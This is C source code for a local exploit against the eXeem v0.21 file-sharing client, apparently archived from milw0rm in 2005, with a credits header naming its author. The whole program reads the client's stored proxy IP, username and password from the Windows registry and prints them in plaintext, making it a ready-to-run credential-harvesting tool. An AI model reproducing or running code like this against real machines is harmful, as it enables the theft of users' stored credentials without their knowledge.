/***************************************************************** eXeem v0.21 Local Exploit by Kozan Application: eXeem v0.21 Vendor: www.exeem.com Vulnerable Description: eXeem v0.21 discloses passwords for proxy settings to local users. Discovered & Coded by: Kozan Credits to ATmaCA Web : www.netmagister.com Web2: www.spyinstructors.com Mail: kozan[at]netmagister[dot]com *****************************************************************/ #include #include #define BUFSIZE 100 HKEY hKey; char proxy_ip[BUFSIZE], proxy_username[BUFSIZE], proxy_password[BUFSIZE]; DWORD dwBufLen=BUFSIZE; LONG lRet; int main() { if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem", 0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS) { lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL, (LPBYTE) proxy_ip, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ RegCloseKey(hKey); printf("An error occured!\n"); return 0; } lRet = RegQueryValueEx( hKey, "proxy_username", NULL, NULL, (LPBYTE) proxy_username, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ RegCloseKey(hKey); printf("An error occured!\n"); return 0; } lRet = RegQueryValueEx( hKey, "proxy_password", NULL, NULL, (LPBYTE) proxy_password, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ RegCloseKey(hKey); printf("An error occured!\n"); return 0; } RegCloseKey(hKey); printf("eXeem v0.21 Local Exploit by Kozan\n"); printf("Credits to ATmaCA\n"); printf("www.netmagister.com - www.spyinstructors.com \n\n"); printf("Proxy IP : %s\n",proxy_ip); printf("Proxy Username : %s\n",proxy_username); printf("Proxy Password : %s\n",proxy_password); } else { printf("eXeem v0.21 is not installed on your pc!\n"); } return 0; } // milw0rm.com [2005-02-22]